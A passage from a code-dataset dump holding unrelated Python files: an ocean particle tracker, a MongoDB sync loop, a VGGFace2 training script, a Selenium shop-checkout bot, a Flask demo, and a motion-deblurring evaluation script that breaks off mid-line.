2013.01.30\nor in ipython:\nrun tracker_1.py -dtt 2 -ds 2013.01.30\n\"\"\"\n\n#%% setup\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport time\nimport netCDF4 as nc4\nimport argparse\nimport collections\n\nimport os\nimport sys\nalp = os.path.abspath('../alpha')\nif alp not in sys.path:\n sys.path.append(alp)\nimport Lfun\nLdir = Lfun.Lstart()\n\nfrom importlib import reload\nimport trackfun_1 as tf1\nreload(tf1)\nimport trackfun_nc as tfnc\nreload(tfnc)\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# optional command line arguments, can be input in any order\nparser = argparse.ArgumentParser()\nparser.add_argument('-gx', '--gtagex', nargs='?', type=str)\nparser.add_argument('-ic', '--ic_name', nargs='?', type=str)\nparser.add_argument('-dir', '--dir_tag', nargs='?', type=str)\nparser.add_argument('-sfc', '--surface', nargs='?', type=bool)\nparser.add_argument('-trb', '--turb', nargs='?', type=bool)\nparser.add_argument('-wnd', '--windage', nargs='?', type=float)\nparser.add_argument('-ds', '--ds_first_day', nargs='?', type=str)\nparser.add_argument('-nsd', '--number_of_start_days', nargs='?', type=int)\nparser.add_argument('-dbs', '--days_between_starts', nargs='?', type=int)\nparser.add_argument('-dtt', '--days_to_track', nargs='?', type=int)\nargs = parser.parse_args()\na_dict = args.__dict__ \n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n# ************ USER INPUT **************************************\n# The values set in this section are effectively defaults, and\n# they will be overridden by the command line arguments.\n\n# (1) specify the experiment\n#\nexp_name = 'jdf5'\n#\nif exp_name == 'jdf5':\n gtagex = 'cascadia1_base_lobio5'\n ic_name = 'jdf0'\nelif exp_name == 'jdf6':\n gtagex = 'cas3_v0_lo6m'\n ic_name = 'jdf0'\nelif exp_name == 'hc5':\n gtagex = 'cascadia1_base_lobio5'\n ic_name = 'hc0'\nelif exp_name == 'hc6':\n gtagex = 'cas3_v0_lo6m'\n ic_name = 'hc0'\n#\n# other experiment choices\ndir_tag = 'forward' # 'forward' or 'reverse'\nsurface = True # Boolean, True to trap to surface\nturb = False # Vertical turbulent dispersion\nwindage = 0 # a small number 0 <= windage << 1 (e.g. 0.03)\n# fraction of windspeed added to advection, only for surface=True\nif surface == False:\n windage = 0 # override\n# additional choices, less likely to change\nndiv = 1 # number of divisions to make between saves for the integration\n # e.g. if ndiv = 3 and we have hourly saves, we use a 20 minute step\n # for the integration, but still only report fields hourly\n#\n# modify the experiment name, based on other choices\nif dir_tag == 'reverse':\n exp_name = exp_name + '_reverse'\nif surface:\n exp_name = exp_name + '_surf'\nif turb:\n exp_name = exp_name + '_turb'\nif windage > 0:\n exp_name = exp_name + '_wind'\n \n# (2) set release information\n# \n# You can make multiple releases using:\n# number_of_start_days > 1 & days_between_starts\n#\nds_first_day = '2013.01.29'\nnumber_of_start_days = 1\ndays_between_starts = 1\ndays_to_track = 1\n\n# routines to set particle initial locations, all numpy arrays\n#\n# first create three vectors of initial locations\n# plat00 and plon00 should be the same length,\n# and the length of pcs00 is however many vertical positions you have at\n# each lat, lon (expressed as fraction of depth -1 < pcs < 1)\n#\nif ic_name == 'hc0': # Hood Canal\n lonvec = np.linspace(-122.65, -122.45, 30)\n latvec = np.linspace(47.2, 47.35, 30)\n lonmat, latmat = np.meshgrid(lonvec, latvec)\n plon_vec = lonmat.flatten()\n plat_vec = latmat.flatten()\n pcs_vec = np.array([-.05])\nelif ic_name == 'jdf0': # Mid-Juan de Fuca\n lonvec = np.linspace(-123.85, -123.6, 20)\n latvec = np.linspace(48.2, 48.4, 20)\n lonmat, latmat = np.meshgrid(lonvec, latvec)\n plon_vec = lonmat.flatten()\n plat_vec = latmat.flatten()\n pcs_vec = np.array([-.05])\n \n# ********* END USER INPUT *************************************\n\nif args.gtagex != None:\n Ldir['gtagex'] = args.gtagex\nelse:\n Ldir['gtagex'] = gtagex\n\n# save some things in tr_dict\ntr_dict = collections.OrderedDict()\ntr_dict['exp_name'] = exp_name\ntr_dict['gtagex'] = gtagex\ntr_dict['ic_name'] = ic_name\ntr_dict['dir_tag'] = dir_tag\ntr_dict['surface'] = surface\ntr_dict['turb'] = turb\ntr_dict['windage'] = windage\ntr_dict['ndiv'] = ndiv\ntr_dict['ds_first_day'] = ds_first_day\ntr_dict['number_of_start_days'] = number_of_start_days\ntr_dict['days_between_starts'] = days_between_starts\ntr_dict['days_to_track'] = days_to_track\n\n# override using command line arguments\nfor k in a_dict.keys():\n if a_dict[k] != None:\n tr_dict[k] = a_dict[k]\n\n# make the full IC vectors, which will have equal length\n# (one value for each particle)\nif len(plon_vec) != len(plat_vec):\n print('Problem with length of initial lat, lon vectors')\n sys.exit()\nNSP = len(pcs_vec)\nNXYP = len(plon_vec)\nplon_arr = plon_vec.reshape(NXYP,1) * np.ones((NXYP,NSP))\nplat_arr = plat_vec.reshape(NXYP,1) * np.ones((NXYP,NSP))\npcs_arr = np.ones((NXYP,NSP)) * pcs_vec.reshape(1,NSP)\nplon00 = plon_arr.flatten()\nplat00 = plat_arr.flatten()\npcs00 = pcs_arr.flatten()\n\n# make the list of start days (datetimes)\nidt_list = []\ndt = datetime.strptime(tr_dict['ds_first_day'], '%Y.%m.%d')\nfor nic in range(number_of_start_days):\n idt_list.append(dt)\n dt = dt + timedelta(days_between_starts)\n\n# make sure the output parent directory exists\noutdir00 = Ldir['LOo']\nLfun.make_dir(outdir00)\noutdir0 = Ldir['LOo'] + 'tracks/'\nLfun.make_dir(outdir0)\n\n# make the output directory (empty)\noutdir1 = tr_dict['exp_name'] + '/'\noutdir = outdir0 + outdir1\nLfun.make_dir(outdir, clean=True)\nprint(50*'*' + '\\nWriting to ' + outdir)\n\n# write a csv file of experiment information\nLfun.dict_to_csv(tr_dict, outdir + 'exp_info.csv')\n\n# step through the releases, one for each start day\nfor idt0 in idt_list:\n \n tt0 = time.time() # monitor integration time\n \n # name the release file by start day\n idt0_str = datetime.strftime(idt0,'%Y.%m.%d')\n outname = ('release_' + idt0_str + '.nc')\n print(' - ' + outname)\n out_fn = outdir + outname\n \n # we do the calculation in one-day segments\n for nd in range(tr_dict['days_to_track']):\n \n # get or replace the history file list for this day\n idt = idt0 + timedelta(days=nd)\n fn_list = tf1.get_fn_list(idt, Ldir)\n # if this is not the first day in the release, we use\n # fn_list_prev to get the first file (hour 0) for this day\n if nd > 0:\n fn_list = [fn_list_prev[-1]] + fn_list\n \n # write the grid file (once per experiment) for plotting\n if idt0 == idt_list[0]:\n g_infile = fn_list[0]\n g_outfile = outdir + 'grid.nc'\n tfnc.write_grid(g_infile, g_outfile)\n \n # DO THE TRACKING\n if nd == 0: # first day\n # set IC\n plon0 = plon00.copy()\n plat0 = plat00.copy()\n pcs0 = pcs00.copy()\n # do the tracking\n P = tf1.get_tracks(fn_list, plon0, plat0, pcs0, tr_dict, trim_loc=True)\n # save the results to NetCDF\n tfnc.start_outfile(out_fn, P)\n else: # subsequent days\n plon0 = P['lon'][-1,:]\n plat0 = P['lat'][-1,:]\n pcs0 = P['cs'][-1,:]\n P = tf1.get_tracks(fn_list, plon0, plat0, pcs0, tr_dict)\n tfnc.append_to_outfile(out_fn, P)\n fn_list_prev = fn_list\n \n print(' - Took %0.1f sec for %s day(s)' %\n (time.time() - tt0, str(tr_dict['days_to_track'])))\n print(50*'=')\n","sub_path":"tracker/tracker_1.py","file_name":"tracker_1.py","file_ext":"py","file_size_in_byte":8010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"30544942","text":"# 同步数据库\nimport pymongo\nimport time\n\nclient = pymongo.MongoClient()\nnew_ganjiLib = client['new_ganjiLib']\nlinks_lib = new_ganjiLib['links_lib']\nreal_links = new_ganjiLib['real_links']\ndetail = new_ganjiLib['detail']\nreal_detail = new_ganjiLib['reail_detail']\ncopy_version = new_ganjiLib['copy_version']\n\n\nwhile True:\n #链接清理\n all_links = set([i['url'] for i in links_lib.find()]) # 总数据量\n links = set([i['url'] for i in real_links.find()]) # 干净的数据量\n rest_of_links = all_links - links # 需要增加的数据量\n # #detail数据清理\n # all_details = set([i['title'] for i in copy_version.find()])\n # details = set([i['title'] for i in real_detail.find()])\n # rest_of_details = all_details - details\n # #load urls\n # for i in rest_of_links:\n # real_links.insert_one({'url': i})\n # #load details\n # for i in rest_of_details:\n # real_detail.insert_one(i)\n print(\"secceed load\")\n time.sleep(10)","sub_path":"project/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"270896417","text":"# Copyright (C) 2018-2019 by nepes Corp. All Rights Reserved\r\n# \r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n# \r\n# 1. Redistributions of source code must retain the above copyright notice,\r\n# this list of conditions and the following disclaimer.\r\n# \r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n# \r\n# 3. Neither the name of the copyright holder nor the names of its contributors\r\n# may be used to endorse or promote products derived from this software without\r\n# specific prior written permission.\r\n# \r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\r\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\r\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\r\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\r\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\r\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\r\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\r\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\n# POSSIBILITY OF SUCH DAMAGE.\r\n\r\n\"\"\"\r\nDesigned Neural Networks structure for the Xenqore API library package for Python.\r\n\r\nCopyright (C) 2018-2019 by nepes Corp. All Rights Reserved\r\n\r\nTo use, simply 'import xenqore'\r\n\"\"\"\r\n\r\nimport os, sys\r\n\r\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\r\n\r\nimport xenqore\r\n\r\nimport numpy as np\r\n\r\nimport vggface2_custom\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\n\r\n\r\n### networks parameter setting\r\nnetwork_config = xenqore.utils.NetworkConfig()\r\nnetwork_config.user_defined_name = 'VGGFACE2'\r\n\r\n\r\n### layers parameter setting\r\n### setting arguments default : quantized_weight=True, weight_clip=True, use_bias=True\r\nlayers_config = xenqore.utils.layers_config()\r\n\r\n\r\n### activations parameter setting\r\n### setting arguments defalt : binary_activation=True\r\nactivations_config = xenqore.utils.activations_config()\r\n\r\n\r\n### dataset \r\n(train_x, train_y), (valid_x, valid_y) = vggface2_custom.vgg_load(network_config.classes, start_ind=0)\r\ntrain_x = train_x.astype('float')\r\ntrain_y = np.squeeze(train_y)\r\nvalid_x = valid_x.astype('float')\r\nvalid_y = np.squeeze(valid_y)\r\n\r\nprint('train_x shape : ', train_x.shape)\r\nprint('train_y shape : ', train_y.shape)\r\nprint('valid_x shape : ', valid_x.shape)\r\nprint('valid_y shape : ', valid_y.shape)\r\n\r\n\r\ntrain_datagen = ImageDataGenerator(\r\n horizontal_flip=True,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1\r\n)\r\ntrain_datagen.fit(train_x)\r\n\r\nvalid_datagen = ImageDataGenerator()\r\n\r\nmodel = xenqore.apps.VGGNet13(mode=0, \r\n network_config=network_config,\r\n layer_config=layers_config, \r\n act_config=activations_config, \r\n saved_model='', \r\n classes=network_config.classes,\r\n input_shape=train_x.shape[1:])\r\n\r\nmodel.summary()\r\n\r\n\r\nmodel.compile(\r\n optimizer = tf.keras.optimizers.Adam(learning_rate=network_config.initial_lr),\r\n loss = 'sparse_categorical_crossentropy',\r\n metrics=['accuracy']\r\n)\r\n\r\n\r\ndef lr_schedule(epoch, lr):\r\n if epoch < 100:\r\n return network_config.initial_lr * 0.1 ** (epoch // 50)\r\n else:\r\n if epoch % 20 == 0:\r\n lr = lr * 0.5\r\n return lr\r\n return lr\r\n\r\n\r\ncallbacks = tf.keras.callbacks.ModelCheckpoint(\r\n filepath='tf_' + network_config.user_defined_name + '_result/model_{epoch}.h5',\r\n # Path where to save the model\r\n # The two parameters below mean that we will overwrite\r\n # the current checkpoint if and only if\r\n # the `val_loss` score has improved.\r\n save_best_only=True,\r\n monitor='val_accuracy',\r\n verbose=1)\r\n\r\n\r\ntensorboard_cbk = tf.keras.callbacks.TensorBoard(\r\n log_dir='tf_' + network_config.user_defined_name + '_result',\r\n histogram_freq=1, # How often to log histogram visualizations\r\n embeddings_freq=0, # How often to log embedding visualizations\r\n update_freq='epoch') # How often to write logs (default: once per epoch)\r\n\r\n\r\ntrained_model = model.fit_generator(\r\n train_datagen.flow(train_x, train_y, batch_size=network_config.batch_size),\r\n epochs=network_config.epochs,\r\n steps_per_epoch=train_y.shape[0] // network_config.batch_size,\r\n validation_data=valid_datagen.flow(valid_x, valid_y, batch_size=network_config.batch_size),\r\n validation_steps=valid_y.shape[0] // network_config.batch_size,\r\n verbose=1,\r\n callbacks=[callbacks, tensorboard_cbk, tf.keras.callbacks.LearningRateScheduler(lr_schedule, verbose=1)]\r\n)\r\n","sub_path":"tutorial/VGGFACE2/xenqore_tf_vggface2_train.py","file_name":"xenqore_tf_vggface2_train.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462151461","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom config import keys\nimport time\n\ndef get_attrs(object):\n\treturn filter(lambda m: callable(getattr(object, m)), dir(object))\n\ndef login():\n\tdriver.find_element_by_xpath('//*[@id=\"client-email\"]').send_keys(keys['email'])\n\tdriver.find_element_by_xpath('//*[@id=\"cryptosenha\"]').send_keys(keys['password'])\n\tdriver.find_element_by_xpath('//*[@id=\"login\"]').click()\n\ttime.sleep(5)\n\ndef find_products():\n\tdriver.get('https://www.maze.com.br/pesquisa/?p=' + keys['search_key'])\n\telement = driver.find_element_by_xpath('//*[@id=\"center-middle\"]/article')\n\tfor e in element.find_elements(By.TAG_NAME, \"li\"):\n\t\tfor c in keys['target']:\n\t\t\tif (c.lower() in e.text.lower()):\n\t\t\t\treturn e.click()\n\tfind_products()\n\ndef select_size(url=None):\n\tif url:\n\t\tdriver.get(url)\n\telement = driver.find_element_by_xpath('//*[@id=\"variations\"]/fieldset/div[2]')\n\telements = element.find_elements(By.TAG_NAME, 'span')\n\tprint(len(elements))\n\tfor e in elements:\n\t\tif e.get_attribute(\"innerText\") in keys['sizes']:\n\t\t\tE = e.find_elements(By.TAG_NAME, 'input')[0]\n\t\t\tprint('sizeChosen = ' + e.get_attribute(\"innerText\"))\n\t\t\tclick_element(E);\n\t\t\treturn click_element(driver.find_element_by_xpath('//*[@id=\"btn-buy\"]'));\n\telements.reverse()\n\tfor e in elements:\n\t\tif e.get_attribute(\"innerText\").replace(',', '').isdigit():\n\t\t\tE = e.find_elements(By.TAG_NAME, 'input')[0]\n\t\t\tprint('size = ' + e.get_attribute(\"innerText\"))\n\t\t\tclick_element(E);\n\t\t\treturn click_element(driver.find_element_by_xpath('//*[@id=\"btn-buy\"]'));\n\ndef checkout():\n\tprint('checkout')\n\tclick_element(find_element_by_xpath('//*[@id=\"middle\"]/div/div/form/div/fieldset/input[1]'))\n\tif keys['payment_method'] == 'credit_card':\n\t\tcredit_card()\n\telse:\n\t\tslip()\n\ndef credit_card():\n\tdriver.get('https://www.maze.com.br/seguro/checkout/easy#payment/creditcard') #\n\t# time.sleep(1)\n\tcard_number = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[1]/div/div/div[1]/div[1]/input')\n\tsend_keys(card_number, keys['credit_card_number'])\n\n\tname = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[2]/div/div/div/input')\n\tsend_keys(name, keys['credit_card_name'])\n\n\tmonth = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[1]/div/div/select[1]')\n\tsend_keys(month, keys['credit_card_month'])\n\n\tyear = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[1]/div/div/select[2]')\n\tsend_keys(year, keys['credit_card_year'])\n\n\tcvv = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[3]/div[2]/div/div/div[1]/input')\n\tsend_keys(cvv, keys['credit_card_cvv'])\n\n\tparcelamento = find_element_by_xpath('//*[@id=\"form-checkout\"]/div/div[3]/div/div/div/div/div/div[1]/div[2]/div[3]/div[4]/div/div/div/select')\n\tsend_keys(parcelamento, keys['parcelamento'])\n\n\tif not keys['test']:\n\t\tclick_element(driver.find_element_by_xpath('//*[@id=\"form-checkout-submit\"]'))\n\ndef slip():\n\tdriver.get('https://www.maze.com.br/seguro/checkout/easy#payment/paymentslip')\n\tif not keys['test']:\n\t\tclick_element(find_element_by_xpath('//*[@id=\"form-checkout-submit\"]'))\n\n\n## aux methods\ndef click_element(e):\n\tprint('click()' + e.get_attribute(\"innerText\"))\n\ttry:\n\t\te.click()\n\texcept:\n\t\ttime.sleep(.100)\n\t\tclick_element(e)\n\ndef find_element_by_xpath(string):\n\tprint('find_element ' + string)\n\ttry:\n\t\treturn driver.find_element_by_xpath(string)\n\texcept:\n\t\ttime.sleep(.100)\n\t\treturn find_element_by_xpath(string)\n\ndef send_keys(obj, string):\n\ttry:\n\t\tobj.send_keys(string)\n\texcept:\n\t\ttime.sleep(.100)\n\t\tsend_keys(obj, string)\n\n\nif __name__ == '__main__':\n # load chrome\n options = webdriver.ChromeOptions()\n options.add_argument(\"--start-maximized\")\n driver = webdriver.Chrome(executable_path='./chromedriver', options=options)\n\n # get product url\n driver.get(\n \t'https://www.maze.com.br/painel-de-controle'\n \t# 'https://www.maze.com.br/tenis-nike-sb-dunk-high-pro-truck-it-preto-p9028/'\n \t)\n\n login()\n find_products()\n select_size(\n \t# 'https://www.maze.com.br/tenis-nike-sb-dunk-high-pro-truck-it-preto-p9028/'\n \t)\n\n checkout()\n\n\n # https://www.maze.com.br/seguro/checkout/easy#payment/paymentslip\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"366238812","text":"from flask import Flask, render_template\nfrom models import Lingkaran\n\napplication = Flask(__name__)\n\n@application.route('/')\ndef index():\n\tstr_var = 'pengembang aplikasi web dengan flask'\n\tint_var = 15\n\tfloat_var = 29.05\n\tlist_var = [1,2,3]\n\tdict_var = {'satu': 1, 'dua': 2, 'tiga': 3}\n\tmodel = Lingkaran(30.0)\n\n\t#mengirimkan nilai ke template\n\treturn render_template('index.html',\n\t\tstr_var=str_var,\n\t\tint_var=int_var,\n\t\tfloat_var=float_var,\n\t\tlist_var=list_var,\n\t\tdict_var=dict_var,\n\t\tmodel=model)\n\nif __name__ == '__main__':\n\tapplication.run(debug=True)\n","sub_path":"variable/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642734537","text":"import h5py\nimport os, glob\nimport numpy as np\nimport torch\n\nfrom dataloaders.loader import get_transform\nfrom dataloaders.reporters import *\nfrom main_settings import *\nfrom utils import *\nfrom helpers.torch_helpers import *\nimport scipy.io\nfrom torchvision.utils import save_image\nfrom PIL import Image, ImageDraw\nimport cv2\nimport time\n\nimport pdb\nfrom vis import *\n\ndef get_tbd_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_tbd_folder, '*-8.mat')))\n\tfiles = files[['golf' not in f for f in files]]\n\tfiles = np.r_[files, np.array(glob.glob(os.path.join(g_tbd_folder, '*-12.mat')))]\n\tfiles = np.r_[files, np.array(glob.glob(os.path.join(g_tbd_folder, '*-8_newGT.mat')))]\n\tfiles = files[['ping_wall' not in f for f in files]]\n\tfiles = files[['fall_coin' not in f for f in files]]\n\tfiles.sort()\n\treturn files\n\ndef get_tbd3d_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_tbd3d_folder, '*.mat')))\n\tif files.shape[0] == 0:\n\t\tfiles = np.array(glob.glob(os.path.join(g_tbd3d_folder, 'imgs/*_GT_*')))\n\t\tfiles = np.array([ff+'.mat' for ff in files])\n\tfiles.sort()\n\treturn files\n\ndef get_falling_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_falling_folder, '*_GTgamma.mat')))\n\tif files.shape[0] == 0:\n\t\tfiles = np.array(glob.glob(os.path.join(g_falling_folder, 'imgs/*_GTgamma')))\n\t\tfiles = np.array([ff+'.mat' for ff in files])\n\tfiles.sort()\n\treturn files\n\ndef get_wildfmo_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_wildfmo_folder, '*.mov')))\n\tfiles.sort()\n\treturn files\n\ndef get_youtube_dataset():\n\tfiles = np.array(glob.glob(os.path.join(g_youtube_folder, '*')))\n\tfiles.sort()\n\tinliers = [not '.' in file for file in files]\n\tfiles = files[inliers]\n\tfiles = np.array([file+'.avi' for file in files])\n\tfiles = files[1:]\n\treturn files\n\ndef evaluate_on(encoder, rendering, device, mode = 'tbd'):\n\tlog_folder = tmp_folder+mode+'_eval/'\n\tmedn = 7\n\tupdate_bg = True\n\tverbose = False\n\tdo_defmo = True\n\tdo_deblatting = False\n\tdo_sota18 = False\n\tdo_deblurgan = False\n\tdo_tbdo = False\n\n\teval_d = g_eval_d\n\teval_d = 1\n\tmulti_f = 10\n\n\teval_gt = False\n\teval_gt_steps = 10\n\n\tif do_sota18:\n\t\tfrom helpers.sota18_runner import run_sota18\n\tif do_deblurgan:\n\t\tfrom helpers.deblurgan_runner import run_deblurgan\n\n\tshift = 0\n\text_factor = 4\n\tif mode == 'tbd':\n\t\tfiles = get_tbd_dataset()\n\t\tfolder = g_tbd_folder\n\telif mode == 'tbd3d':\n\t\tfiles = get_tbd3d_dataset()\n\t\tfolder = g_tbd3d_folder\n\t\tmedn = 50\n\telif mode == 'tbdfalling':\n\t\tfiles = get_falling_dataset()\n\t\tfolder = g_falling_folder\n\t\tshift = 250\n\t\tmedn = 50\n\t\text_factor = 4\n\telif mode == 'wildfmo':\n\t\tfiles = get_wildfmo_dataset()\n\t\tfolder = g_wildfmo_folder\n\t\tmedn = 50\n\t\text_factor = 1\n\telif mode == 'youtube':\n\t\tfiles = get_youtube_dataset()\n\t\tfolder = g_youtube_folder\n\telse:\n\t\tprint('Mode not found!')\n\n\tif do_defmo:\n\t\tav_score_tracker = AverageScoreTracker(files.shape)\n\tif do_deblatting:\n\t\tav_score_tracker_tbd = AverageScoreTracker(files.shape,'tbd', False)\n\t\tav_score_tracker_tbd3d = AverageScoreTracker(files.shape, 'tbd3d', False)\n\tif do_tbdo:\n\t\tav_score_tracker_tbd3do = AverageScoreTracker(files.shape, 'tbd3do', False)\n\tif do_sota18:\n\t\tav_score_tracker_sota18 = AverageScoreTracker(files.shape, 'sota18', False)\n\tif do_deblurgan:\n\t\tav_score_tracker_dg = AverageScoreTracker(files.shape, 'deblurgan', False)\n\n\tfor kkf, ff in enumerate(files):\n\t\tif mode == 'tbd':\n\t\t\tif 'GX' in ff:\n\t\t\t\tmedn = 7\n\t\t\telse:\n\t\t\t\tmedn = 50\n\t\tgtp = GroundTruthProcessor(ff,kkf,folder,medn,shift,update_bg)\n\t\tif do_defmo:\n\t\t\tlogger = SequenceLogger(log_folder, gtp)\n\t\tif do_deblatting:\n\t\t\tlogger_tbd = SequenceLogger(log_folder, gtp, 'tbd')\n\t\t\tlogger_tbd3d = SequenceLogger(log_folder, gtp, 'tbd3d')\n\t\t\tseq_score_tracker_tbd = SequenceScoreTracker(gtp.nfrms, 'tbd', False)\n\t\t\tseq_score_tracker_tbd3d = SequenceScoreTracker(gtp.nfrms, 'tbd3d', False)\n\t\tif do_sota18:\n\t\t\tseq_score_tracker_sota18 = SequenceScoreTracker(gtp.nfrms, 'sota18', False)\n\t\tif do_tbdo:\n\t\t\tlogger_tbd3do = SequenceLogger(log_folder, gtp, 'tbd3do')\n\t\t\tseq_score_tracker_tbd3do = SequenceScoreTracker(gtp.nfrms, 'tbd3do', False)\n\t\tif do_deblurgan:\n\t\t\tseq_score_tracker_dg = SequenceScoreTracker(gtp.nfrms, 'deblurgan', False)\n\n\t\tseq_score_tracker = SequenceScoreTracker(gtp.nfrms)\n\t\test_traj = None\n\t\tfor kk in range(gtp.nfrms):\n\t\t\tgt_traj, radius, bbox = gtp.get_trajgt(kk)\n\t\t\tI, B = gtp.get_img(kk)\n\t\t\tgt_hs = gtp.get_hs(kk)\n\n\t\t\tif not gtp.w_trajgt:\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tbbox, radius = fmo_detect_hs(gt_hs,B)\n\t\t\t\telse:\n\t\t\t\t\tbbox, radius = fmo_detect_maxarea(I,B)\n\t\t\t\tif np.min(radius) < 5:\n\t\t\t\t\tif verbose:\n\t\t\t\t\t\tprint('Seq {}, frm {}, nothing found'.format(gtp.seqname, gtp.start_ind+kk))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tbbox = extend_bbox_uniform(bbox,radius,I.shape)\n\n\t\t\tbbox_tight = extend_bbox_uniform(bbox.copy(),10,I.shape)\n\t\t\tif gtp.use_hs:\n\t\t\t\tbbox_tight = bbox_fmo(bbox_tight,gt_hs,B)\n\t\t\tbbox = extend_bbox(bbox_tight.copy(),ext_factor*np.max(radius),g_resolution_y/g_resolution_x,I.shape)\n\n\t\t\tim_crop = crop_resize(I, bbox, (g_resolution_x, g_resolution_y))\n\t\t\tbgr_crop = crop_resize(B, bbox, (g_resolution_x, g_resolution_y))\n\t\t\t\n\t\t\tif do_defmo:\n\t\t\t\tpreprocess = get_transform()\n\t\t\t\tinput_batch = torch.cat((preprocess(im_crop), preprocess(bgr_crop)), 0).to(device).unsqueeze(0).float()\n\t\t\t\twith torch.no_grad():\n\t\t\t\t\tstart = time.time()\n\t\t\t\t\tlatent = encoder(input_batch)\n\t\t\t\t\tsteps = gtp.nsplits*multi_f\n\t\t\t\t\tif eval_d > 1:\n\t\t\t\t\t\tsteps = gtp.nsplits*eval_d + 1\n\t\t\t\t\t\tmulti_f = 1\n\t\t\t\t\ttimes = torch.linspace(0,1,steps).to(device)\n\t\t\t\t\trenders_orig = rendering(latent,times[None])\n\t\t\t\t\tif eval_d > 1:\n\t\t\t\t\t\trenders = renders_orig[:,:-1].reshape(1, gtp.nsplits, eval_d, 4, g_resolution_y, g_resolution_x).mean(2)\n\t\t\t\t\telse:\n\t\t\t\t\t\trenders = renders_orig\n\t\t\t\t\tav_score_tracker.next_time(time.time() - start)\n\n\t\t\t\trenders_rgba = renders[0].data.cpu().detach().numpy().transpose(2,3,1,0)\n\t\t\t\test_hs_crop = rgba2hs(renders_rgba, bgr_crop)\n\n\t\t\t\test_traj_prev = est_traj\n\t\t\t\tif True:\n\t\t\t\t\test_traj = renders2traj(renders,device)[0].T.cpu()\n\t\t\t\telse:\n\t\t\t\t\test_traj = renders2traj_bbox(renders_orig[0,g_eval_d//2+1::g_eval_d].data.cpu().detach().numpy().transpose(2,3,1,0))\n\t\t\t\test_traj = rev_crop_resize_traj(est_traj, bbox, (g_resolution_x, g_resolution_y))\n\n\t\t\tif do_deblatting or do_tbdo:\n\t\t\t\tif gtp.use_hs:\n\t\t\t\t\tbbox_temp = bbox_detect_hs(crop_only(gt_hs[:,:,:,0],bbox_tight), crop_only(B,bbox_tight))\n\t\t\t\t\tif len(bbox_temp) == 0:\n\t\t\t\t\t\tbbox_temp = bbox_tight\n\t\t\t\t\tdebl_dim = bbox_temp[2:] - bbox_temp[:2]\n\t\t\t\telse:\n\t\t\t\t\tdebl_dim = (radius,radius)\n\t\t\t\tbbox_debl = extend_bbox_uniform(bbox_tight.copy(),0.5*radius,I.shape)\n\t\t\t\tif do_tbdo and gtp.w_trajgt:\n\t\t\t\t\trgba_tbd3d_or, Hso_crop = deblatting_oracle_runner(crop_only(I,bbox_debl),crop_only(B,bbox_debl),debl_dim,gt_traj[[1,0]]-bbox_debl[:2,None])\n\t\t\t\t\tHso = rev_crop_resize(Hso_crop[:,:,None,:][:,:,[-1,-1,-1],:],bbox_debl,np.zeros(I.shape))\n\t\t\t\t\test_hs_tbd3d0 = np.zeros(I.shape+(gtp.nsplits,))\n\t\t\t\t\tfor tmki in range(gtp.nsplits): \n\t\t\t\t\t\tHsc = Hso[:,:,0,tmki]/np.sum(Hso[:,:,0,tmki])\n\t\t\t\t\t\test_hs_tbd3d0[:,:,:,tmki] = 